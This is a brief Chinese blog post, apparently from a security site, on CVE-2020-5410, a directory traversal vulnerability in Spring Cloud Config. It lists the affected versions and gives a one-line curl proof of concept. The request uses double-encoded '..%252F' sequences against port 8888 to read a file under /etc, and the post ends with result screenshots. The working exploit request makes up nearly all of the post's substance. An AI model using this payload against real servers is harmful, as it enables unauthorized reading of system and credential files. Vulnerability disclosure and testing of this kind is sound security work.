CVE-2020-5410 Spring Cloud Config 目录穿越

7月20日发布

020

# CVE-2020-5410 Spring Cloud Config 目录穿越

影响版本：
– 2.2.0 to 2.2.2
– 2.1.0 to 2.1.8

poc：
“`java
curl http://127.0.0.1:8888/..%252F..%252Fetc%252Fdd.txt%23/CESHI
“`
读取/etc/dd.txt文件

![1.png](/media/editor/1_20210720222444284648.png)

![linux_b.png](/media/editor/linux_b_20210720222452221429.png)

![linux_file.png](/media/editor/linux_file_20210720222456382027.png)

文章版权归作者所有，未经允许请勿转载。

THE END

喜欢就支持一下吧

请登录后查看评论内容

1[投稿]某知识星球付费资源，价值120大洋